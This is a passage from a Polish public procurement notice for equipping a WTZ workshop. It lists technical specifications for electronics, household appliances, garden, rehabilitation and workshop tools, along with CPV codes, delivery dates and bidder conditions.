lumen, obsługa sygnału 4K Ultra HD, elastyczna instalacja: korekcja geometrii obrazu w pionie i w poziomie, wygodny współczynnik projekcji 1.5:1 - 1.8:1 / zoom x1,2, Regulacja ostrości (focus): ręcznie, Obsługiwane rozdzielczości (wejścia cyfrowe): do 4K Ultra HD 3840x2160 ,30hz, Wielkość obrazu: przekątna 30 cali - 300 cali, Możliwości podłączenia: Komputer (analogowe): 1x wejście VGA Mini D-sub 15-pin (kompatybilne z Component YPbPr), 1x wyjście VGA Mini D-sub 15 pin, Cyfrowe: 2x wejście HDMI z obsługą HDMI audio, Composite Video: 1x wejście RCA, Audio: 1x wejście 3.5 mm Stereo Mini Jack, 1x wejście 2RCA Stereo, 1x wyjście 3.5 mm Stereo Mini Jack, Control: 1x D-Sub 9 pin (RS-232), LAN: 1x RJ45, USB: 1x Type A (USB 2.0 high speed), 1x Type B, długi okres eksploatacji lampy i filtra, żywotność lampy do 15 tys. Godzin, prezentacje które zwracają uwagę: wysoka jasność, doskonałe kolory, głośnik o mocy 16 W, wszechstronność i mobilność: kompaktowa obudowa oraz niewielka waga, szerokie możliwości połączeniowe, Funkcje pilota: automatyczne dostosowanie geometrii obrazu, dostosowanie obrazu, kontrola audio, numer ID, opcjonalna kontrola myszy i prezentacji, proporcje obrazu, tryb Help Eco, tryb obrazu, wybór źródła sygnału, wyciszenie AV, zatrzymanie obrazu, zoom cyfrowy, Głośnik: 1x 16 W (mono), Cechy specjalne: automatyczny start i automatyczne wyłączanie, automatyczny tryb ECO, blokada klawiszy OSD, Crestron RoomView, funkcja Direct Power-Off, funkcja lupy, funkcja wirtualnego pilota, korekcja koloru ściany, menu OSD w 29 językach, NaViSet Administrator 2, opcjonalne logo użytkownika, przeglądarka USB dla plików JPEG i PNG, symulacja standardu DICOM, szybki start i szybkie wyłączanie, timer czasu wyłączenia, transmisja kontentu przez sieć, wyświetlacz USB, zabezpieczenie hasłem, zabezpieczenie przed nieautoryzowanym użyciem, zarządzanie kolorem, Funkcje EKO: automatyczny tryb ECO, funkcja 75% AV Mute, inteligentny system zarządzania energią, oprogramowanie do planowania trybu pracy, terminarz ECO, zielony przycisk na pilocie ECO i AV mute, zredukowane zużycie energii	112	Gilotyna do cięcia papieru	1c)	Część III zamówienia: Zakup Artykułów Gospodarstwa Domowego jako doposażenia do pomieszczeń WTZ.Przedmiotem zamówienia jest dostawa niżej wymienionego sprzętu:L.p.	Nazwa elementu doposażenia – Artykuły Gospodarstwa Domowego	Ilość w szt.1	2	31	Piekarnik parowy (59,4 cm x 59,4 cm x56,9 cm, w kolorze srebrny stal, klasa energetyczna A+++,, pojemność 72 l, drzwi uchylne, sterowanie elektroniczne, chowane pokrętła na froncie piekarnika)	12	Patelnia elektryczna (Średnica 55 cm, wysokość 60 mm, powłoka teflonowa, odłączany termostat z zasilaniem, pokrywa z przezroczystą szybą, moc 1,6 kW, napięcie 230 V, aluminiowa)	13	Ekspres do kawy (1,7 l, moc 1500 W, ciśnienie 15 bar, automatyczny, wbudowany młynek, sterowanie elektroniczne, podwójny dozownik, automatyczne przygotowywanie, czyszczenie, odkamienianie, wyłączanie)	14	Kuchenka mikrofalowa (antybakteryjna powłoka z emalii ceramicznej, system potrójnej dystrybucji, funkcja rozmrażania żywności, moc 800 W, pojemność 23 l, elektroniczny panel sterowania, wym.: szer. 48,9 cm, gł. 35,5 cm, wys. 27,5 cm)	15	Podgrzewacze-termosy (stal nierdzewna, pojemnośc 20 l, wskaźnik poziomu wody, regulowany termostat	26	Lodówka Szafkowa (wymiar WxSxG 178 cm x 91,2 cm x 77,2 cm, poj. Chłodziarki 411 l, poj. Zamrażalki 236 l no Frost, w kolorze stal nierdzewna, klasa energetyczna A++)	17	Płyta gazowa 5-cio palnikowa (5 palników, w tym 1 palnik wok, szklane pole grzewcze, mechaniczne sterowanie, pokrętła na płycie grzewczej, żeliwny ruszt, zabezpieczenia przeciwypływowe gazu, wym. 86 cm x 51 cm)	18	Zmywarka (wym. SxWxG 60 cm x 85 cm x 62,5 cm, pojemność 14 kpl, zużycie wody 10,5 l /cykl, szuflada na sztućce, zewnętrzny panel sterowania, sterowanie elektroniczne, automatyczne programy zmywania, elektroniczny wyświetlacz)	19	Pralka automatyczna (wym. (GxSxW 45 cm x 60 cm x 85 cm, pojemność 7-8 kg, max. 1200 ob./min, załadunek prania od przodu, elektroniczny programator, klasa energetyczna A+++, kolor biały lub srebrny)	110	Suszarka (wym. GxSxW 63,8 cm x 59,6 cm x 85 cm, poj. 8 kg, pompa ciepła, suszarka kondensacyjna, programator elektroniczny, wyświetlacz elektroniczny dotykowy, możliwość montażu na pralce)	1d)	Część IV zamówienia: Zakup paneli podłogowych, parapetów wewnętrznych oraz rolet okiennych wewnętrznych jako doposażenia do pomieszczeń WTZ .Przedmiotem zamówienia jest dostawa niżej wymienionego sprzętu: L.p.	Nazwa elementu doposażenia – Zakup oraz montaż paneli i parapetów	Ilość w jb.1	2	31	Panele podłogowe – 100 m2 (klasa ścieralności AC 5, grubość min. 12 mm, antypoślizgowe, pływająca typu clic, imitująca drewno)	100m22	Podkład pod panele 100m23	Listwa przypodłogowa PCV 100 m4	Listwa progowa	4 szt.5	Narożniki zewnętrzne i wewnętrzne złączki	35 szt6	Parapety PCV dł. 160 cm, szer. 30 cm	5 szt.7	Rolety okienne typu dzień i noc, montaż bez wiercenia otworów, położenie mechanizmu prawe lub lewe, nieprzejrzysta i półprzezroczysta, tkanina poliester, linka i belka PCV. Rozmiar wys. 2 m, szer. 39-40 cm	16 szt.8	Rolety okienne typu dzień i noc, montaż bez wiercenia otworów, położenie mechanizmu prawe lub lewe, nieprzejrzysta i półprzezroczysta, tkanina poliester, linka i belka PCV. Rozmiar wys. 2 m, szer. 72-73 cm	16 szt.e)	Część V zamówienia: Zakup sprzętu i narzędzi ogrodniczych jako doposażenia do pomieszczeń WTZ.Przedmiotem zamówienia jest dostawa niżej wymienionego sprzętu:L.p.	Nazwa elementu doposażenia – Narzędzia ogrodnicze	Ilość w szt.1	2	31	Teleskopowe elektryczne nożyce do żywopłotu (możliwość przycinania na odległość, regulowany uchwyt, moc 600-800 W, ciężar max. 8 kg)	12	Teleskopowa elektryczna piła do cięcia gałęzi (moc 750 W max. waga 5kg, dł. Prowadnicy 8’’, zasięg 180-240 cm, trzonek piły zrobiony z aluminium)	13	Kosa spalinowa (moc 650 W, waga max 7kg, poj. Skokowa 24,5 m3	14	Rozdrabniacz spalinowy do gałęzi rębak (5 KM, pojemność silnika min. 196 cm3, max. obroty 3600 obr/min, transport urządzenia na kołach, możliwość rozdrabniania gałęzi o średnicy max 12 cm)	15	Taczki (wym. 40 cm x 60 cm wys. 65 cm, poj. 100 l, koło o średnicy 40 cm, ocynkowana powierzchnia, waga max. 15 kg)	26	Kosiarka spalinowa standardowa (moc. 6 KM, szer. Koszenia 41 cm, dodatkowo kosz na trawę o poj. 55 l, regulacja koszenia 25mm-75mm, stalowa obudowa, z napędem)	17	Kosiarka samojezdna z wyrzutem bocznym – traktor wielofunkcyjny (moc 20KM, poj. 65 cm3, automatyczna przekładnia, max. waga 175 kg, regulacja do 5 pozycji, dwa ostrza, boczny i tylny wyrzut trawy, dodatkowo możliwość odśnieżania zimą)	18	Odkurzacz spalinowy do liści (ssanie automatyczne, poj. 27,6 cm3, moc 0,80 kW, funkcja easy start, dodatkowo worek 55l oraz szelki, waga max. 5 kg)	19	Glebogryzarka (silnik spalinowy, 3KM, 2,2 kW, waga max 40 kg, poj. Skokowa 140 cm3, szer. Robocza 45 cm, możliwość regulacji do 60 cm	110	Jednoosiowy ciągnik z przyczepką (moc 4,9 HP, poj. Silnika 212 cm3, szerokość pracy 110 cm, max. waga 150 kg, dwa poziomy prędkości + wsteczy, ładowność do 400 kg, max. prędkość 10km/h	111	Grabie (12-zębowe) – dł. 160 cm, waga max. 1 kg, stalowa głowica	312	Grabie (15-zębowe) – dł. 160 cm, waga max. 1 kg, stalowa głowica	313	Graczka (stalowa końcówka, długość min. 160 cm)	514	Małe nożyce – krótkie do cięcia krzewów i trawy (3,6 V, ostrze 12 cm, zakres cięcia 8 mm, waga 1kg, czas pracy baterii do 50 min, czas ładowania do 100% (w min. 18), bateria litowo-jonowa, akumulator 2, Ah, w zestawie ładowarka i dwie baterie)	115	Nożyce długie (ostrze 65 cm, max grubość cięcia 18 mm, waga 5,5 kg, napięcie 18 V, w zestawie akumulatory i ładowarka)	116	Drabina 3-4 stopiowa 117	Pawilon ogrodowy (wym. 2,5 x 2,5, stelaż z plandeką)	218	Pawilon ogrodowy (wym. 2,5 x 3,75, stelaż z plandeką)	1f)	Część VI zamówienia: Zakup sprzętu rehabilitacyjnego jako doposażenia do pomieszczeń WTZ.Przedmiotem zamówienia jest dostawa niżej wymienionego sprzętu:L.p.	Nazwa elementu doposażenia – Sprzęt rehabilitacyjny	Ilość w szt.1	2	41	Bieżnia (max obciążenie 150 kg, moc stała silnika 3,0 KM, moc max silnika 5,0 KM, prędkość 0,8-17 km/h, zmiana co 0,1 km/h + 6 przcisków do wyboru prędkości, szeroki antypoślizgowy pas bieżni, 3 zmiany kąta nachylenia bieżni, wyświetlacz LCD-czas, prędkość, dystans, kalorie, puls, wejścia USB, MP3, funkcja wprowadzania własnych parametrów, pomiar pulsu – sensory dotykowe, zmiana prędkości w rączkach lub z panelu głównego, system bezpieczeństwa – klucz magnetyczny. 12 programów dotykowych)	12	Rower Stacjonarny (wym. DxSxW 92 cm x 42 cm x 139 cm, waga użytkownika do 150 kg, optymalny wzrost 150-190 cm, zasilanie sieciowe 230 V, 50Hz, opór elektryczno-magnetyczny, elektroniczna regulacja oporu, ergonomiczne siodełko, regulacja wysokości oraz siodełka, kierownica wykończona antypoślizgową pianką, regulacja kąta nachylenia kierownicy, dotykowe sensory pulsu kierownicy, antypoślizgowe pedały, wzmocnione łożyska, wbudowany komputer, wyświetlacz LCD przedstawiający kalorie, puls)	13	Rower Poziomy (waga użytkownika do 150 kg, dwa sensory dotykowe, system napędowy: pasek rowkowany, układ hamulcowy z magnesem trwałym, opór sterowany komputerowo, obciążenie do 16 poziomów, wyświetlacz LCD, wskaźnik dystansu, czasu, prędkości, spalonych kalorii, 19 programów treningowych. Pomiar tętna poprzez sensory dotykowe dłoni, zasilanie 230V, 50 Hz)	15	Zestaw do ćwiczeń – wałek+uchwyty+ekspander (obciążenie od 5 kg do 45 kg, wykonane z lateksu)	26	Piłeczki do ćwiczeń manualnych (piłki wyposażone w wypustki, wykonane z wytrzymałego materiału PCV, średnica 65 mm)	2g)	Część VII zamówienia: Zakup narzędzi stolarskich jako doposażenia do pomieszczeń WTZ.Przedmiotem zamówienia jest dostawa niżej wymienionych narzędzi:L.p.	Nazwa elementu doposażenia – maszyny stolarskie	Ilość w szt.1	2	31	Pilarka taśmowa (silnik 1,5 kW, koła śr = 380 mm z gumową okładziną, wysokość cięcia 315 mm, szerokość 360 mm, przchylny stół żeliwny, przykładnica równoległa, elektryczny hamulec, zabezpieczenie przed przeciążeniem, długosc piły taśmowej 3531mm-3581mm.	12	Wyrówniarko – grubiarka (szer. Strugania 260mm, długość stołu 1120 mm, wys. Strugania 4-225 mm, max grubość zbioru 4mm, synchroniczna przekładnia posuwowa 6 (7.2) m/min przy 50 (60) Hz, przykładnica wyrówniarki przechylna 90º -45º, anodowana płyta prowadząca przykładnicy wyrówniarki, stoły jednocześnie podnoszone. Automatyczny 3-nożowy wał strugarski 260 mm, automatycznie samonastawny. Wał z nożami ułożonymi w spirali umożliwiającymi kątowe natarcie noża w materiał.	13	Mobilne urządzenie wyciągowe + oprzyrządowanie (1,1 kW, króciec odciągu 140 mm, rozgałęźnik DI 140 mm – DA 120 mm i 80 mm do podłączenia węża, wąż do odciągów D=120 mm, wzmocniony, lej odsysający podłogowy, szybkozłącze proste, 120/120 mm, obejma zaciskowa D=120-140mm.	1h)	Część VIII zamówienia: Zakup narzędzi warsztatowych jako doposażenia do pomieszczeń WTZ.Przedmiotem zamówienia jest dostawa niżej wymienionych narzędzi:L.p.	Nazwa elementu doposażenia – narzędzia warsztatowe	Ilość w szt.1	2	41	Szlifierka kątowa duża (moc 2600 W, prędkość obrotowa 6500/min, średnica tarczy 230)	22	Szlifierka kątowa mała (moc 1000 W, średnica tarczy 125 mm)	23	Wiertarka+wkrętarka (wiertarka akumulatorowa bezszczotkowa z udarem, 18V, zakrętarka udarowa bezszczotkowa 18V, ładowarka wolnonapięciowa, 2 akumulatory 5.0 Ah, mocny kufer, wiertarka sds plus, napięcie zasilania 230 V, max moc 800 W, energia udaru 2,6 J, max liczba udarów 500, typ uchwytu Sass plus, prędkość obrotowa 1500 RPM, możliwość kucia)	14	Szlifierka oscylacyjna (moc 600 W, bezobsługowa przekładnia, możliwość przyłączenia urządzenia odsysającego, papier ścierny mocowany na rzep lub urządzeniem mocującym, pow. szlifująca 115x229 mm, skok oscylacji 5,0 mm, częstotliwość skoków 6000/min.	15	Młotowiertarka (technologia antywibracyjna, moc znamionowa 1050W, prędkość Obr. Na biegu jałowym 680/min, częstotliwość udarów na biegu jałowym 2500/min, energia pojedynczego urządzenia 6,1J, wiertło pełne 40 mm, zdolność wiercenia koronka 105 mm, uchwyt narzędziowy SDS-MAX, udar elektropneumatyczny)	16	Sprężarka+osprzęt (wydajność na ssaniu 3201/min, wydajność na tłoczeniu 2501/min, max ciśnienie 10 bar, moc znamionowa 2,2 kW, max pr. Obr. 1350/min, wielkość zbiornik min 100 l, poziom hłasu 78 db, długość kabla 1,5 m, wąż pneumatyczny 30 m, pistolet do malowania oraz pompowania kół.	17	Spawarka (max prąd spawania 140 A w cyklu 35%, zasilanie z sieci lub agregatu prądotwórczego, przewód masy i spawalniczy 3m, stpien ochrony IP 21, klasa izolacji H, + przyłbica spawalnicza i rękawice)	18	Stoły z imadłami (z płyty MDF 24 mm, ocynkowana blacha 1,5mm, dodatkowo ochwyty narzędziowe, imadło oraz oświetlenie LED)	19	Regał+tablica narzędziowa (płyta MDF 24 mm, ocynkowana blacha 1,5mm, dodatkowo tablica narzędziowa oraz uchwyty narzędziowe, imadło i oświetlenie LED, tablica narzędziowa z blachy 1,2 mm, kwadratowa 10x10mm, odstępy między otworami 38mm)	13.	Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 5 do SIWZ – opis przedmiotu zamówienia4.	Kody i nazwy Wspólnego Słownika Zamówień:a)	Część I zamówienia: Zakup oraz montaż mebli i krzeseł jako doposażenia do pomieszczeń WTZ:39100000-3 Meble39112000-0 Krzesłab)	Część II zamówienia: Zakup sprzętu elektronicznego jako doposażenia do pomieszczeń WTZ:30213100-6 Komputery przenośne30213300-8 Komputer biurkowy30232110-8 Drukarki laserowe30121200-5 Urządzenia fotokopiujące32324600-6 Telewizory cyfrowe32344210-1 Sprzęt radiowy32333200-8 Kamery wideo38651000-3 Aparaty fotograficzne30232100-5 Drukarki i plotery38652100-1 Projektory42991100-0 Urządzenia introligatorskiec)	Część III zamówienia: Zakup Artykułów Gospodarstwa Domowego jako doposażenia do pomieszczeń WTZ:39220000-0 Sprzęt kuchenny, artykuły gospodarstwa domowego i artykuły domowe oraz artykuły cateringowe39713100-4 Zmywarki do naczyń39713210-8 Pralki i suszarkid)	Część IV zamówienia: Zakup paneli podłogowych, parapetów wewnętrznych oraz rolet okiennych wewnętrznych jako doposażenia do pomieszczeń WTZ:44191600-1 Panele parkietowe44221000-5 Okna, drzwi i podobne elementy39515410-2 Rolety wewnętrznee)	Część V zamówienia: Zakup sprzętu i narzędzi ogrodniczych jako doposażenia do pomieszczeń WTZ:44511200-7 Narzędzia ogrodnicze16160000-4 Różny sprzęt ogrodniczy16311100-9 Kosiarki do pielęgnacji trawników, zieleni parkowej lub terenów sportowych16120000-2 Brony, spulchniarki, kultywatory, brony chwastowniki lub glebogryzarki44423200-3 DrabinyKOD CPV: 39142000-9 Meble ogrodowef)	Część VI zamówienia: Zakup sprzętu rehabilitacyjnego jako doposażenia do pomieszczeń WTZ:37441000-1 Sprzęt do ćwiczenia aerobiku37441300-4 Rowery stacjonarne37440000-4 Sprzęt do ćwiczeń fizycznych37441700-8 Piłki do ćwiczeńg)	Część VII zamówienia: Zakup narzędzi stolarskich jako doposażenia do pomieszczeń WTZ42642100-9 Obrabiarki do obróbki drewna42999000-5 Odkurzacze i froterki do podłóg inne niż używane w gospodarstwie domowymh)	Część VIII zamówienia: Zakup narzędzi warsztatowych jako doposażenia do pomieszczeń WTZ43830000-0 Urządzenia warsztatowe42652000-1 Ręczne narzędzie elektromechaniczne43811000-1 Szlifierki do drewna43414000-8 Szlifierki4330000-0 Narzędzia ręczne z napędem mechanicznym42123000-7 Sprężarki42662000-4 Sprzęt spawalniczy39151200-7 Stoły robocze39141100-3 Regały5. Zamawiający nie ustala kluczowych części zamówienia, które muszą zostać wykonane osobiście przez Wykonawcę.6. Zamawiający nie przewiduje wymagań, o których mowa w art. 29 ust. 3a ustawy Pzp. 7. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.8. Wykonawca może składać ofertę na wszystkie lub wybrane przez siebie części zamówienia:a)	Część I zamówienia: Zakup oraz montaż mebli i krzeseł jako doposażenia do pomieszczeń WTZb)	Część II zamówienia: Zakup sprzętu elektronicznego jako doposażenia do pomieszczeń WTZc)	Część III zamówienia: Zakup Artykułów Gospodarstwa Domowego jako doposażenia do pomieszczeń WTZ.d)	Część IV zamówienia: Zakup paneli podłogowych, parapetów wewnętrznych oraz rolet okiennych wewnętrznych jako doposażenia do pomieszczeń WTZ.e)	Część V zamówienia: Zakup sprzętu i narzędzi ogrodniczych jako doposażenia do pomieszczeń WTZ.f)	Część VI zamówienia: Zakup sprzętu rehabilitacyjnego jako doposażenia do pomieszczeń WTZ.g)	Część VII zamówienia: Zakup narzędzi stolarskich jako doposażenia do pomieszczeń WTZ.h)	Część VIII zamówienia: Zakup narzędzi warsztatowych jako doposażenia do pomieszczeń WTZ.9. Zamawiający wymaga aby dostawa przedmiotu zamówienia nastąpiła w terminie nie wcześniej niż 01.01.2021 i nie później niż do 31.01.2021 roku.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">39100000-3</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30213100-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30232110-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>30121200-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32324600-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32333200-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>38651000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>38652100-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>42991100-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39220000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39713100-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39713210-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>44191600-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39515410-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>44511200-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>16160000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>16311100-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39142000-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>37441000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>37441300-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>42642100-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>42999000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>43830000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>42652000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>43414000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>43300000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>42123000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>42662000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39151200-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39141100-3</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia">2021-01-01</span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2021-01-31</span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'>2021-01-01 </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2021-01-31</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Wypełniony formularz ofertowy stanowiący załącznik nr 1 do SIWZ wraz z formularzem cenowym stanowiący załącznik nr 2 do SIWZ. 2. W przypadku podpisywania oferty lub poświadczenia za zgodność z oryginałem kopii dokumentów przez osob(ę)y nie wymienion(ą)e w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo ( jeśli dotyczy). Pełnomocnictwo powinno być przedstawione w formie oryginału lub poświadczonej za zgodność z oryginałem kopii. 3. Załącznik nr 6 do SIWZ - zastrzeżenie informacji stanowiących 